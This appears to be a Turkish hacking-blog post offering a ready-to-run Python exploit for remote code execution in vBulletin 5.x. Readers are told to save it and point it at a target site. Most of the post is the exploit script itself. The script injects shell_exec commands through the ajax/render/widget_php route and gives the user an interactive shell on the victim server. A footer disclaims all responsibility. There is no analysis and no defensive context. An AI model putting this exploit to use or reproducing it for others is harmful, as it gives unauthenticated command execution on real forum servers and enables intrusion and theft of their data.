GondomaN

RCE in vBulletin v5.0.0-v5.5.4

// On :10 Mart 2020 Salı


vBulletin 5.5.2, 5.5.3, 5.5.4 sürümlerin de uzaktan kod çalıştırmanıza yarayacak bir exploit

verdim dosyayı .py olarak kayıt edin her han gibi bir terminal yardı mı ile

python vb.py http://hedefsite.com/



Python:
#!/usr/bin/python

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed!")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))

Leave a Reply

Subscribe to Posts | Subscribe to Comments

// Copyright © ɢoɴdoмαɴ $εcuƦι†ψ //Anime-Note//Powered by GondomaN // Hiçbir Sorumluluk Kabul Etmiyoruz Sadece Paylaşımları Yaptık Kodlayan Kişinin Sorumluluğundadır.. GondomaN Security //